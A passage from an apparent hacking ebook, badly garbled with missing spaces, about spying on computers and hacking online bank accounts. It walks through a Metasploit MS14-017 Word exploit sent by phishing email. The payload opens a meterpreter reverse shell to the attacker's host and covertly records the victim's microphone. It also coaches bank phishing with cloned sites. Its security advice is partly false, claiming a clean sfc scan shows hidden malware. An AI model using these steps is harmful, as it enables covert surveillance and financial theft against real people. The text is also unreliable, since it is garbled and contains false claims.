As a real hacker, you should actwith responsibility andnever forget to assumeeverything you do, even if we are talking about white hat hacking or black hathacking,bothof themrequestamaturecreativemind,notonlya creativemindbecauselittlechildrenhavealsocreativeminds,buttheydon’tbecamehackersinthemostofthecases.

Hackers don’twant only to hack your computer, they are doing it because theywant to get deeply in your life, so they decide to spy on you by hacking yourcomputer.Duetothecomputertechnologyspyingisnotanymoreanactionthatcouldbeperformedonlybyagenciesandorganizations likeCIA,NSA,andKGBbecauseyoucandoittooifyouareadedicatedandmotivatedhacker.Thisbookisgoingtotellyouhowtotransformanycomputerintoalisteningdevice.

StartbyinstallingKaliandafterthatcontinuebyfiringitup,youshouldbeabletodiscreditthecomputerwantedinordertoconvertitintoalisteningdevice.Afterdoingthis,makesureyouarecompromisingtheRemoteComputerandoneofthegreatestwaytodoitisbysendingthecomputeranemailthatwillgetthewantedclickonalinkordocumentandinsidethedocumentyoushouldembedalistenerthatwillenableyoutoturnonthemicrophoneonthetargetcomputerandcollectalltheconversationsthataremadearoundthecomputer.Tomakesureyougainyourvictim’sattentionpleaseselectaninterestingandexcitingsubjectthatwouldattractthevictimimmediately,yourmaingoalisearningthatmagicclick.

Youshouldassociatethisprocesswithalittlebitofsocialengineeringbecauseinmost of the cases, hackers know their victims and their weakness so take fullbenefitandifit’syourbusinessrivalthensendhimanexceloraccessdocument,anything the victimmightmakeput interest in.Hackers are just too smart andbusy with their stuff and that’s why they would never listen to foreignconversationsbetweenunknownpeople.Youwillsearchforanexploitnext,youshouldfindacustomerwhousesthevulnerabilitiesofMicrosoftWord,afewtimeagoMicrosoftpostedanofficialreportabouttheirvulnerabilitythatallowremotecode execution, the file was named MS14-017 and if you search the web withattentionyouwillfindexploit/windows/fileformat/ms14_017_rtf,onceyoufoundthisyoushouldloaditintoMetaspoilt:

msf>useexploit/windows/fileformat/ms14_017_rtf

msfexploit(ms14_017_rtf)>

Afteryou’vegotitloadedwrite”info”tofindoutmoreinterestingstuff

Playloadinformation:

Space:375

Description:

ThismodulecreatesamaliciousRIFfilethatwhenopenedinvulnerableversionsofMicrosoftWordwillleadtocodeexecution.

The flaw exists in how a list override count field can be modified to treat onestructure as another. This bug was originally seen being exploited in the wildstarting April 2014. This module was created by reversing a public malwaresample.

References:

http://cvdetails.com/cve/2014-1761

http://technet.microsoft.com/en-us/security/bulletinMS14-017

https://virustotal.com/en/file/e278eef9f4ea1511aa5e368cb0e52a8a68995000b8ble6207717d9ed09e8555a/analysis/

afterthecomputerdisplaytheabove,selectshowoptions

msfexploit(ms14_017_rtf)>showoptions

Moduleoptions(exploit/windows//fileformat/ms14_017_rtf):

NameCurrentsettingRequiredDescription

––-–––––—–––-––––

FILENAMEmsf.rtfnoThefilename.

Exploittarget:

IdName

–––

0Microsoftoffice2010SP2EnglishonWindows7SPIEnglish

YoumaynoticethatthisexploitworksonlyonMS2010,theinformationweneedfromtheaboveisFILENAME.

After that,create the fileyouwant tosendandthenset thepayloadright in thedocument by sending the payload tometerpreter because it let you control thehackedsystem.msf>setPAYLOADwindows/meterpreter/reverse_tcp.

ThenextstepissettingupLHOSTwithyourownIPaddressbecauseitishelpingyoutogetnotifiedwhenthesystemisusedbyyourvictim,endthisstepbywriting“exploit.”Thiswillcreateafilethatplacesthemeterpreteronthevictim’ssystem.

Toreceivetheconnectionbacktoyoursystemyoumustopenamulti-handlerconnection

msf>useexploit/multi/handler

msf>setPAYLOADwindows/meterpreter/reverse_tcp

AfterthissteppleasesettheLHOSTtoyourinternetprotocol.

Once you created your malicious file send it to your victim and wait until it’sopenedbythevictimontheirsystem.Afterthevictimopenthedocumentsheisgoingtopassameterpretersession.

Use the Metasploit Ruby script that activates the microphone on the hackedcomputer and form the meterpreter prompt like this meterpreter > runsound_recorder-l/root.

Youcanfindtherecordingsatyoursystemina/rootdirectoryinafile.

Theworstpartaboutthismethodisthatistakingahugeamountofmemory,somakesureyouprepareyourhardwarefortheoperationaswell.

Andbecausehackersarehelpingtechnologytogoon,therearepersonswhotakecareofthehackers,sotheycreatedmanysiteswheretheoldhackerscanexercisetheirskillsandbeginnerstolearnfewthingsabouthacking

This kind of websites are very helpful and you can learn really good stuff atHackingTutorial,Evilzonehackingforums,HackaDay,HackintheboxorHackthissite!,theyareofferingtrainingmaterialsandabigrangeoftipsandtricksforhackers,butthosekindsofsiteswon’tmakeyouamasterinhackingbutyoucandefinitelybecomeonebytryingtoworkonthebiggestproblemsandagreatwayto challenge your mind is searching for those kind of impossible, unsolvedproblemsandtryingtofindasolutionforeachofthem.

Computer hacking has its legal limits too, it’s ok to do what you like and tryeverythinginthatdomainuntilyouareinprison,sowhilehackingadrenalineisfreakingyououtdon’t forget that therearepeoplewhocan’twait to judgeyouractions.

Theproblemsyouwillmeetinhackingareactuallyareflectionofrealproblemsinthe real life, and real problems in life should be treated with full seriousness,attention,responsibilityandalotofknowledge,it’sthesameprocedureincaseofhacking,youcan’thackjustforfunforalongperiodoftimebecausebydoingityouincreaseyourchancestogeta“freetrial”inthefederalprisonandthiswouldbeunlikabletoanyhackerbecausewithoutfreedomyoucan’tdoyourstuff,youcan’taccessyourmaterialsandsomepeoplearecontrollingyourlife,sotakecaretoNOTarriveatthatpoint.

OnlineBankingHacking

After you learnedaboutdifferent typesofhacking, there is a last one to take inconsiderationandthattypeofhackingiscalledInternetBankingHackingandit’sconsideredacybercrimeinthemostcountriesoftheworld.

Inthelastyears,internetbankinghasbecomeafeatureusedbyabignumberofpeopleandithasitsadvantages,butthemaindisadvantageisthatoncehackersgetintothistypeofhackingallthemoneyarelost.Authoritiesandexpertanalysesestimate that in the futureyears thecasesofonlinebankinghackingwill takeaconsiderablegrowth.Onlinebankingexistssince1980andnewmethodstohackonline bank accounts are appearing everyday. This book will tell you thefundamentalmethodsusedinonlinebankinghackingsinceitappeared.

Thefirstmethodyoucanchooseforhackinganonlinebankaccountisphishing,thenumberof thiskindofattacksaregrowing in the lastyearsagainstbankingsystems,tohackthevictimyoushouldusesocialengineeringtechniquesaswell.

Hackershideunderabank identity andmake theirnew identity lookas real aspossiblepretendingtobelongto thebank,maliciousemails,advertisementsandemails are the top secret in getting into someone’s bank account without theirpermissionorknowledge.

You should adopt the typical phishing scheme and try to collect as muchinformationasyoucanaboutyourvictim,beforeanythingelseyoushouldknowtheiremailaddressandifthevictimusesthisaddressforonlinebankingbutdon’tworry,mostofthepeopledoitbecauseit’salittlebittoocomplicatedtoworkoncoupleemailsatatimeandpeoplewhochooseinternetbankingareusuallybusyandtheydon’thavetimetofollowmorethananemailaddress.

So,afteryouhavegottheemailaddress,sendanyemailthatcangetyourvictim’sattention by opening that email, the content of the email can be somethinginteresting or in this case it’s better to guide your victim though a link to aspecializedwebsitethatwillaskforfinancialdataandsecuritydetails,thosekindof websites are specially designed to look like an official bank account, but isdefinitely not the original one, those infectedwebsites are designed identical totheoriginalones.

Youremailshouldmakethevictimclickonalinkwhichwillguideyourvictimtoawebsitewhichperfectlyreplicatesabanksite.

Hackersalsoincludeintheemailattachmentswhichcontainthelinktothefakewebsiteandonceopenedithasthesameeffect.Phishingemailsshouldtaketheofficialformofnotificationsandemailsofthebanks,organizationsore-paymentsystems,thosekindsofmessagesrequestyourvictim’ssensitiveinformationthatwill help you reachyourgoal.Malwarespeciallydesignedforonlinebankinghackingexist!it’snamedPrgBankingTrojan.

McAfee has published a report on phishing which indicates that hackers aren’t

hackingsmallbanks,theirtargetsarebigcompanies,banksandorganizationthatcouldworth thehack operation to be done. 37%of all banks on the globewerehackedusingthephishingmethodinthelast12mothsatleastonce.

Hackers attempt to every sector by phishing it. Hackers are interested inpredominantlybanking,e-paymentsystems,e-auctionsandgenerally inhackingbigfinancialorganizationsaroundtheglobe.

Phishersarefocusedonbreakingintohostingprovidersandtheysucceedinmostof the cases, hackers disgracing servers and update their own configuration inordertodisplayphishingpages fromaprivatesubdirectoryofeachdomainthatthemachinehost.

Don’tforgettoprotectyourselfevenifyouaretryingtohackonlineaccounts,withalittlelackofattentionyoucanlooseeverythingaswellasyourvictims.

Don’t divulge your Internet Protocol, read carefully every email and don’t clickunless you are sure, ask and requestmore information always in order to keepprotected.

The second method used by hackers to break into online banking accounts iscalledWateringHoleandspecialistsdefineitasanevolutionofphishingattacks.By choosing this option hackers are injecting malicious codes onto a publicwebsitevisitedbyasmallandstandardgroupofpeople.

InWateringHoleattack,hackerswaitfortargetpeopletovisitthehackedwebsiteandtheyarenotinvitingtheirvictimstodoit, theyareonlywaitingforthemtovisitthewebsite.Ifyouchoosethismethod,youshoulduseInternetExplorerandAdobeFlashPlayer.

Hackers are compromisingwebsites using thismethod that aren’t updated andconfiguredveryfrequentbecausetheyareeasilytohackthananupdatedwebsite,usuallyhackersareusingtheexploitkitstheyfindontheblacksquare.

Prohackershackthewebsiteatleastsixmonthsbeforetheyattackit.

Thismethod is very efficient because hackers andwebsites can be located veryhard comparatively to phishing attacks.After the attacks hackers keep in touchwiththewebsitetomakesurethateverythingisgoinginthedirectiontheywantto.

In2012,hackersusedthismethodtohackaregionalbankinMassachusetts.TheoperationwassuccessfulduetotheJavaScriptelementsonbothsites,thebankinMassachusettsandthelocalgovernmentthatwasunderWashingtonDCsuburbs:

Hxxp://www.xxxxxxxxtrust.com

Hxxp://xxxxxxcountrymd.gov

Another attack using this method was discovered in March 2013 when manybanks in South Korea were compromised, the hackers collected sensitive datafromthebankandtheyhavealsoshutdowntheirsystem.Aninterruptionoftheir

serviceswasmadeontheironlinebanking.

Hackers consider this method a solution for the problems that authorities andsecurityservicesandsystemsgivethem,andbecausetheylovetosolveproblems,theyfoundaninnovativesolutioninthiscaseaswell.

Researchesshowthatmostofthehackersmakemoneyonlineusingthismethodandalotofthemarestillundetected.

Hackers have a lot of ideas and they are really good, their ideas reflect in theirsolutionsandthat’showPharmingandCreditCardRedirectionhackmethodwasborn.

Thismethodconsistsinhijackingabank’sURLandwhenthecustomersaccessitthey are automatically guided to another site which is identical to the originalwebsite. Thismethod of hacking is a little bitmore difficult than the other twomethods, but not impossible. You can technicallymake it with one of the nexttechniques:

1. DNSCachePoisoning

DNS’sexistinabank’s,organization’sorcompany’snetworktomakeabetter

responseperformance.HackersattacktheDNSserverbyexploring

vulnerabilitiesintheDNSsoftware,whichmaketheservertogiveanerror

becauseitwillincorrectlyvalidatetheDNSresponse.

Theserverwillredirectpeopletoanothersitebecauseitwillcatchwrongallthe

entries.Usually,theserverwhichwillhostthevictimsismanagedand

controlledbyhackersinordertogivethecustomersmalware.Hackerscaneven

attackcustomersiftheyprovidethehackerstheirIP.

2. HostsFileModification

Hostsfileisusedbyhackerstodirectthecustomersonanywebsiteundertheir

control.

A new technique is Credit card redirection which is used on disgraceful e-commercewebsitestoletthehackersgetthesensitiveinformationtheyneed.

Thistechniqueisnothackingthecustomerdirectly,afterthevictimpaysusingthecard,thehackermodifytheflowoftheoperationandallthemoneyareredirectedto them and most of the attacks are made on websites that offer e-commerceservices.

Hackersalsobreakintoavictim’saccountbychangingthecreditcardprocessingfile.

Another typeofattacksused inonlinebankinghacking is calledMalwarebasedattacks and they are classified as the most dangerous attacks on the internet

relatedtoonlinebankingservices.

Therearemanymalicious categoriesbut in general theyaredesigned tohittheonlinefinancialbusiness.

SecuritycommunityconsidersZeus,CarberpandSpyeyeareconsideredthemostdangerousofall.ZeusisinfactaTrojanhorsewhichbestworksonalltheversionsofWindows,itwasfirstdiscoveredin2007whenhackersuseittoobtainillegallyinformation about US Department of Transportation, it’s the oldest one fromthosethreeandevenNASAgothackedin2009usingZeus.

MIITB ismaybe themost efficientmethodusedby hackers in internet bankingwhere the ones who want to attack combine social engineering with malwarewhichisinfectingthebrowserofthevictim.ItmostlyhideundertheformofBHO(BrowserHelperObject),attacksarebasedonproxieswhichinfectthebrowserofthecustomerexploring it’sweaknesson thevictim’sdevice.Maliciouscodesareable to change the content of an online transaction between the bank and thecustomer.

TheZeusTrojanisalsousedtohackandgetbankcredentialsbyMIITkeystrokelogging.SpecialistsconsiderthatninemillionphishingemailswithZeusweresentin2009.

According to ZeusTracker USA, Deutschland, Russia, UK, Ukraine, Romania,Netherlands,France, JapanandTurkey are top ten countrieswhicharehostingZeus.

HoT-HandonThiefisanotherTrojanspeciallydesignedtohackonlinebanking,it was created to hit the Linux and Mac systems which demonstrated to beimmunetomalware.AuthoritiessaythatitwascreatedinRussiaandit’savailabletobuyonsomeRussianundergroundforums,it’scapableofinfectingthevictimsandstealingsensitiveinformationfromtheirmachines.

GrabbersandbackdoorinfectionvectorsarecurrentlyonsalewithHandofThiefforapproximately$3000.

DDoS attacks are also used to hack internet banking. In case of online bankinghacking, hackers are helped by volunteers that participate in the operation, abotnetiseasiertodetectandvolunteerscanblockthewholeprocessofdetecting.

After129countrieshavebeenattackedwithDDoSattacks,FBIdecidestosharealist of more than 130.000 Internet Protocol addresses used in attacks, attackswherethevictimscouldnotaccesstheironlineormobilebankingservices.

ThefundamentaltypesofDDoSattacks:

The ones based on volume VBA- the hacker is making an inundation with bigquantityofdataonthesite.

ProtocolAttacksPA-whenthehackersare trying to imbue the targetserversbyexploitingnetworkprotocolfailures.

LayerSevenAttacks- created to exhaust the resource limitswhenhackersmakeinundations with huge amounts of HTTP requests that saturate a target’sresources.

DDoSattacksarealsousedasadeflectiontohidetheresultsofanattackthatisongoing. Dirt Jumper is a part of DDoSmalware group and it has an updatedversion called Pandora, a big number of DDoS kits have shown up like YZF,ArmageddoN and DiWar. FBI and FS-ISAC and IC3 are highlighting thedistributionofDirtJumperkitbeingusedinbankattacks.

Using themethods fromabove, hackers can getmoney and they are also calledcriminalcyberiftheydothisactivityillegally,theycanhackanultimatenumberofaccountandbanksuntiltheyarediscovered,iftheyareeverdiscovered.

Nowmore than ever, hackers don’t focus only on computers, they also take inconsiderationhackingthemobilephoneswhicharetodaysuchanresultofgreatideascombinedwithhardwork,sincethephonesaresmartphonestheyallowyouto do any kind of operation you want or need and they are way more usednowadaysthancomputers,alotofpeopleusetheirsmartphonetopaybillsonlineortodotransactionsonlineviainternetbankingservicesallaroundtheworldandthat’swhyhackersarefocusingalsoonsmartphonesandhackingtheirsystemsinorder to reachanewgoal or just to give themselvesnewchallenges.A researchdonein2015highlightstheimportanceofsmartphonesandshowsusthatsmartphonesaremoreusednowadaysthencomputers.

CHAPTER4:HACKINGANDNON-HACKING

HackersandtheLaw

Everythinginthislifehasitsownlimitsandconsequences,youcan’teatwithoutstoppingandgettingfat,youcan’tdriveyourcarwithoutstoppingandgivingherfuel, youcan’t jump free fromaplanewithoutaparachuteandnotgettinghurtand you can’t hack forever except if you are doing ethical hacking. But do youknowhowfaryoushouldgo?!

The main problem is that government agents aren’t making the differencebetweenthetwotypesofhackers,soifyouarebasicallycurioustotestyourskillsonasystemyoucanwinuptotwentyyears inprisonjust likeblackhathackerswhoarespyingontheinternet,hackingimportantsystemsandhaveevilgoals.

Orworstthanthat,therewillbenodifferencebetweenyouandapersonwhohaskilledorabusedothermembersofthesociety.

In general, governments aren’t paying too much attention for hackers, anightmareforthegovernmentisrepresentedbysmarthackerswhocouldnotbedetectedanddoitjustforamusementandbecausetheyarepassionate,soifyouareablackhathackeryoushouldhaveintelligenceandspeedreactioninordertostay under cover forever. Government carelessness about those who help themsometimes improve their systems is brightly reflecting in the laws thatgovernmentisimputingnomatterinwhichcountryontheglobe.Let’stakeasanexample United States of America because they are at themoment the biggestpolitical,economicalandsocialpowerintheworld.

InUnitedStatesofAmericatherearemanylawsthatarebanninghackingjustlike18 U.S.C. § 1029 which focuses on creation, division and use of codes andmachinesthatgivehackerillegalaccesstoacomputersystem.Thelanguageofthelawis incompleteandunfairbecause it ismakingreferenceonly tocreatingandusingamachinewithabadintention,butitdoesnotmakeanyspecificationabouttesting,learningandunderstandingsystems.

Ifwetakeacloserlooktothelaws,wecanalsofindanotherinterestinglawinU.SDepartmentofJusticewhichis18U.S.C.§1030,thislawisbanningunauthorizedaccesstogovernmentmachines.Thelawisconsideredbrokenevenifthehackeronlyenteredthesystemwithoutdoinganythingelse.

Thereisabigrangeofpenaltiesgoingfrombigconsiderablefinstoyearstospendin the jail. Officials consider that minor hacking actions deserve punishmentstartingwithsixmonthswhilebiggeractionsofhackingandattackscantakeuptotwentyyearsinprison,theymainlyfocusonthedamagesmadebythehackerbutdoesnotanyonethinkaboutthemoneyspentonthehacker’slifeinprison?

Let’s analyze another country, let’s take as an example aEuropean country likeGermany(Deutschland)whichhassimilarlawsincomparisonwithUSA.ThereisalawinGermanythatisbanningevenpossessionofhackingtoolsandevenifyou

neveropenorusethem,onceyouarediscoveredyoucan’tescape.Thenationiscomplainingaboutthislawbecausemanyapplicationsfallunderthedefinitionofhackingtoolsanditisaninfractionunderthislawiforganizationsorcompanieshiresomehackerstochecktheirsystemweaknessandflaws.

Believeitornot,Germanyhasadoptedanewlawin2007whichisgoingwaytoofar because even if you go in a computer stole and ask the seller to give you acomputerbecauseyouwanttostarthackingeven ifyouarekiddingyouwillgetarrested ifofficialshearaboutyour joke,more than that, if theyouwillbuy thecomputerfromthesellerhewillbearrestedtoo,don’tjoketoomuchifyougotoGermany,youneverknowwhenyoucouldbeconsideredwrong.

TravelingtoAfrica,thesituationisalittlebitmoredifferent,inSaudiArabiaforexample it’s considered a law deviation if you have a false name in a hackingoperation according toArticle 4 of theirBasic Law ofGovernance.Another lawgoingtoofarinthesamecountryisaboutassistingtosuchanoperationandnottellingtheofficialsabouttheoperation;evenifyouarewatchingyourfriendhowheistestingasystemandyouaren’ttellingtheofficialsaboutitit’sconsideredacybercrime.

TakingalookatthesituationinAsia,lawsarealittlebittoopermissiveinChinaandmaybethat’swhytheyareinthefirstplaceathackingintheworldbutofficialsourcessaythatthesituationwillchangeinthefuturebecausethegovernmentistaking careof thisproblemand they are formulatingnewmeasures forhackinganditsadepts.

TopTencountriesinhackingputsUnitedStatesonthesecondplaceafterChina,followed by Turkey, Russian Federation, Taiwan, Brazil , Romania, India, ItalyandHungary.

Beforedecidingtotestsystems,makesureyouhavefullyreadandunderstoodallthelawsabouthackinginyourcountry,becarefulallthetimeaboutwhatareyousayingandtowhomyouaresaying.

Legalityoffersyouasagiftyourfreedom,thisgiftisverypreciousanditisevenmorepreciousthanyourpassionbecausethosetwothingsgohandbyhand,youcannottakefulladvantageofyourpassioninprisonwheremostlikelyifyou’reahackertheywillbanaccesstoacomputerinyourcase.

Giveaspecialattentiontothe laws,becauseeven ifyouthinkthat theyareveryunfairyoucannotavoidthemandintheendyouareunderyourcountry’slawssoplease make sure you will not break them. Hacking operations are a sensiblesubject for every country and the big problem in the world is that people whomakethelawsarenotinknowledgeofeverythingaboutadomainandthat’swhysometimeswearesupposedtorespectlawsthataremakingnosense.

HowdoHackersAffectOurLives

AccordingtoNewton’sThirdLaw,foreveryactionthereisanequalandoppositereactionandthisisjustsotrue.Everythingwemakehasaneffectbutsometimeswedonotnoticetheeffectorevenrealizethereisgoingtobeaneffect,butsomeofussimplyignoretheeffectsoftheiractions.

Hackinghas its effects too as any other action; there are effects on individuals,organizationsandonsocietyingeneral.

Let’s see the effects on every level starting with the effects of hacking on anorganization.Itdependsofcourseonthehacker’sgoalbutgenerallyhackingisbigcompaniesandorganizationsworstenemiesbecausetheycancausehugedamagesintotheireconomy.

For example, in2003-2004UnitedKingdomhaspaiddue to computerhackingbillions of pounds in order to solve their problems. A BBC article relates thatviruses designed by hackersmade a damage of $55 billion around theworld in2003inbusinessesdomain.In2011,Sonyhaspaidfromitspocketaround$170million because they have got their Play Station hacked in a single shot, at thesame timeGoogle has paid around a halfmillion dollars due to “middle sized”hackingoperations.RichardPowersaysthatdueonehackingsessioncompaniesandorganizationscanpayuptosevenmilliondollarinonesingleday.

Despite the financialside, there isaneffectontheorganizationsandcompaniesinformation; most of the hackers search instead of cash money some valuableinformation such as plans, researches, strategies and reports. Online databasescan be a hacker’s goal as well as reports, theymight want to obtain addresses,phonenumbers or emails, such an attackon a small companywould cost themmorethanthecompanyitself.

Somehackerstrytoaffecttheorganizationalstructureofacompanybymodifyingit or stealing from it the elements theywant to but this kind of attack is reallydifficulttorealizebecausemostofthecompaniesemployspecializedITteamsthatare always working on updating, creating and civilizing security systems topreventhacking.

Hackingaffectsalsothecomputerandtechnologyindustrybuttheindustrymaytakebenefitfromhackingiftheyknowhowtoredirectthesituationintheirfavor.

Private companies which are specializing on creating security systemsmay usehackingasakeytotheirsuccess.

Morethanthat,companiespreferpreventionnotcuresotheymightinvesthugequantitiesofmoneyonsecuritysystemsandwhynothardwarebecausetherearehackswhichcanbepossibleonlymodifyingthehardware.

Onceweknowtheeffectsonthislevel,wecanmovetoanotherlevelwhichwillbehackingeffectsonsociety.

Onlyanexampleofhackingcangetsocietycrazyandmakeitsmembersspendbigmoney on better software, which is not a bad thing because a better softwaremeansalwaysabetterlife.

Hackingiscausingmoneylosshereaswellbecausesocietymembersaren’talwaysgoodinformedaboutmalwareandwhatcouldmalwaredosotheyarehappywhentheyreceiveanemailthatispromisingthemmillionsofdollarsiftheygavetheirpersonalinformation.Socialengineeringisaffectingthiscategoryinaveryintensemodebecausemalware and social engineering are like the relationshipbetweenyourhandsandyoureyeswhenyouarecrying;youalwaysremoveyourtearswithyourhands.

So,hackersareresponsiblebothforexcellentandawfuleffectsonthesociety.

As an effect of White Hat hackers we own basics such as the Free SoftwareFoundationthathave finished itpossible forcomputeradepts toexercise, learn,copy,adjust,andreorganizecomputerprogramswithoutpaying for it.GreyHathackershavealsohadhelpfulimpactsonsocietybyrunningtofindvulnerabilitiesintraditionalsoftwareproductswiththe intentionsofnotifyingthecreatorsanddesigners so they can secure the troubles before a Black Hat hacker can comealonganddeveloptheerror.

Thesocietygotaffectedin2002whenacyberterrrormovementwasstartedbyagroup of hackers named El8 against awhitehackersgroupknownasProjectMayhem.Thecampaign’sgoalwascausingachaosaroundtheglobebydestroyingtheinfrastructureofsecuritysystemsmanufacturing.

This isnoteverything, there isonemoreeffectand thateffect ison individuals.Hackers can loose everything starting from their life funds and transform theirfinancialsituationbybringingitunderground.Asahackeryouhavetoworkwithpeople and invest a lot of time in this by listening to everyone’s problems andtrying to solve them, theproblem isnot this, theproblem is thatpeopledonotunderstand what you are trying to explain because few people have a base inhackingandexplainingthesituationtothemcanbringyournervesdown.Anothereffectgainedbyhackersisthefinancialone,onlypassionatehackersmakevirusesand discover new techniques to hack for free, the rest are using hacking as amachine togetmoneybecause theyget informationandsell it lateror theycancreateandsendvirusesspeciallyformoney.

Also,byhackingtheycanrisktheirfreedomandthat’stheworstthingfromalltheabove.

Ineachcase,hackingaffectbadlyreputation,itaffectsthehacker’sreputation,theorganization’s reputation and the society’s reputation as well and that’s howhackingcandamageeffectively the reputationandusually themostaffectedarethebigcompaniesandorganizationsbecauseif theyarehackedafewtimesinashorttimetheycanloseupto50%fromtheircustomers.

Hackingalsohasanimpactonthecomputersanditcanaffectcomputersintwo

ways:affectingthesoftwareandaffectingthehardware,bothcanbedestroyedifthehacker is skilled and the couldbeneverbroughtback in some cases, but inothercasesthedamageisnottoobigandownerscanuseitagainafterthehack.

HowtoKnowifYou’reHacked

Eachoneofuscanbeavictimofsomeone’shack,thefirststepinsavingyourselfisknowingthatyouarehackedandafterthatgotoaspecialisttomakesurethatyourproblemexistandtofindasolutionasfastaspossible.Buthowdoyouknowyouhavebeenhacked?

Thefirstpart:Observethemarksofapossiblehackbyfollowingthenextsteps:

Who knows your computer better than you do? No one, so please take a closegenerallookandspotifthereissomethingthatgoeswrongsuchasyourcomputerspeed, files loss, thecomputer isnot recognizingyourpasswordandyoucannotopenprograms,surprise!Someprogramsyoudidn’tinstall,it’sconnectingtotheinternetautomaticallyevenifyoudidnotactivatethisoption,fileshavesufferedchangesandifyouhaveaprinteritwayactstrangely.

The next step is going online see if you can access all the websites with yourpasswordandifyoucanthenthat isagoodsignbut ifwhenyougoonlineyoursearches are redirected to another pages/sites and if there will born new extrabrowserscreensthenIdon’thavethebestnewsforyou.

You can turn suspicious and get worried if there aremultiple toolbars on yourbrowser,thisisanimportantsignthatyouhavebeenhackedalsoifyourantivirussoftware is not working and if you receive fake virus messages you might behacked. Visible signs of hacking are some bills you get without purchasinganythingandcheckyoursentsectionintheemailtoseeiftherearesomeemailssent except the ones you sent, sometimes the fake emails donot appear on thevictim’sscreenbuttomakesurecallafriendandaskforthelastemailsendbyyouoranystrangeemailreceivedfromyou.

Googleyourself!Thishelpsalotinfindingoutifyouarehacked,seeifthereareanytoopersonalinformationthatyouhavenotmadepublic.

Hackers usually fully control yourmachine if they want, so if things are goingcrazyandthesituationisnomoreunderyourcontrolthenyouaremanipulatedbyanotherperson100%.

Thesecondpart:whatyoumustdoifyourecognizedanysignsoftheabove

Firstofall,throwawayyourinternetconnectionanddisconnectasfastasyoucanbecause in this way if there is someone controlling your computer they willimmediatelylosetheconectionwithyou,don’tforgettoplugouttheroutertoo.

So,rightnowyouarefullyundermissionandyoushouldpaymoreattentionfromnowon,tocontinuestartupyourcomputerandbootitinsafemodemakesureitisdisconnectedcompletelyandusesafemodefromyourcomputertoreopenit.

Afterthat,takeacloselookandcheckforanynewprogramslikeanti-spaywareoranti-virus and it’s recommended to check if your programs and files refuse toopen.Ifyouarefindingnewstrangeprogramsyoudidnotinstall,uninstallitbut

if you do not know how call a computer center service and bring a specialistuninstalltheprogramsforyou.Thenextstepyoushouldfollowisscanningyourcomputer,doasweepusingananti-viruslikeAvira,AVGorAvastanddon’tforgettorequesthelpifyouareunsureaboutthis.Ifthetestendsupwithnothingpleaseback up the files you consider important and after that do a complete systemrestoreandmakesureyougetthelatestupdates.

Ifyouhavebeenanonlinebankinghackingvictim,takeyourphoneandalertthebank! Contact them to explain the situation and to store your accounts, a goodideaistorequestsomeadvicesforthefutureaboutfundsprotection.

Andthelaststepistoalertallthepeoplethathaveyouremailandletthemknowabout your problembut donot give too personal details,make sure you clearlyexplainwhatishidingbehindtheemailsfromyouandmakethemdeletetheemailandtonotfollowanylinksorsuspiciousmaterial,askthemiftheyalreadydiditand if they did it help themprotect their computer and act in theway you justactedinyourcase,let’sgivehelpifwecan.

Somepeople live theirwhole lifewithoutknowing theyarehacked,andmostofthemdonotevencareaboutthisaspectbecausetheyarenotgivingtheirdevicesattentionandtheyreallydonotcareaboutthemonlyiftheycanhitthem,whichisverypossibletohappenbecausemostofthemputimportantandpersonalstuffontheirmachinesuchasbusinessdocuments,personalphotos,personalvideosandsensitivedataingeneralwhichtheywanttokeepprivatebutoncetheyarehackedallthosedatacanbesharedwiththepublic.

Remember that everything could get hacked; this is the main reason why weshouldinvest inqualitysoftwareandpayaspecialkindofattentiontoallofourdevices, if anything is going strange with your device even if it is a printer,computer,phoneor tabletplease take the rightattitudeand if youdonotknowhowtodothestepsfromabove,takeyourdevicetotheclosestcenterthatofferssupport todeviceswhichworkelectronically, it isbetter topaya sumofmoneythanlosingeverything.

Themethodpresentedwillnottakeyoutoolongtosaveyourcomputer’slifebut,intheend,everypersonis freetobuildtheir lifeastheywantbychoosingwhattheywant.Donotletothercontrolyourlifebycontrollingyourcomputer,evenifthehackedcomputerworksprettygoodyoushouldtoyourbest inorderto loseconnectionwithyourhacker.

Some hackers use professional and sophisticated systems and if they want toinfectsomething,inmostofthecasestheywillmakethehacklooklikeitisapartof your system. Sophisticated systems allow hackers use the bestmalware thatembeds itself in the hacked system and the hacked system will not be able todetectitoreventoremoveit.

Ifhackersgetmoreprofessional,youmustdoitandthisbookisgoingtopresentanothermethod,alittlebitmorecomplicatedthatwillhelpyoutoknowifyouare

hackedornot,andifyouaregivingyouasolutionisamusttodo.Hackerswhoprefersophisticatedmethodstohackwanttocreateabotnetwhichisanetworkofcompromisedmachinesmanaged by them; a botnet can have only a commandcenter.Togetridofthiskindofhacks,kindlyfollowthenextsteps:

Make sure youhave a goodquality anti-virus, anti-malware softwarewhich candetect all kinds of viruses and malware like Trojans, worms, keyloggers androotkits,becausetherearecomingupeverydaynewversionsofmalwareandtheymightnotberecognized,buttrytogetthe latestversionsofanti-virusandanti-malware because it is better. So, run your anti-virus software and start doingactivesessionsofscanning.

Next,seewhatisgoingonwithyourTaskManager,itisthefirstthingyouhavetocheckifyouaresuspiciousaboutbeinghacked.Insteadoftheclassicmethod(TypingTaskManagerinthesearchlineofyourStartbutton)toopenit,youcantrysomethingfasterwithyourkeyboardbybeatingCtrl+Alt+DelatonceandselectingTaskManagerattheendofthemenuthatshowsup.AfteryouopenTaskManagerselectbyclickingtheoption“Processes”andawindowissupposedtoshowup,checkyourCPUUsageatthebottomofthewindowandiftheCPUistoohighsomethingisgoingonyourmachinewithoutyourpermission.

Ingeneral,oncleananduninfectedmachinesCPUUsageisunder10%.

Move to thenext step inorder to continue theprocessandcheckyour system’sintegrity in Windows because once you know that there is something on yoursystemyoushouldtrytoidentifyitaswell.MicrosofthasbuiltasystemintegritycheckerintoWindowsknownassfc.exewhichmustbeabletotesttheintegrityofthefilesinyoursystemandithelpsyoualotinscanningforcorruptions.

Acommandpromptisessentialsopleaseopenoneifyouhavenotyet,afteryourright-clickingselectRunasAdministratorandwritethecommand/sfc/scannow/andthesystemwillwelcomeyouwithsomethinglike:

MicrosoftWindows[Version6.1.7601]

Copyright<c>2009MicrosoftCorporation.Allrightsreserved.

C:\Windows\system32>sfc/scannow

Beginningsystemscan.Thisprocesswilltakesometime.

Beginningverificationphaseofsystemscan.

Verification100%complete.

WindowsResourceProtectiondidnotfindanyintegrityviolations.

C:\windows\system32>

Andifitisdisplayingsomethingliketheabovemeansthatthesystemisinfectedwithahiddenmalware.

After that, test Network Connections using Netstat because hackers arecommunicating with your computer via internet connections, Windows has anutility called Netstat and it is specially designed to make you able see all theconnectionson themachine,youwillneedagainacommandpromptsoopen itandusethecommand/Netstat-ano/.

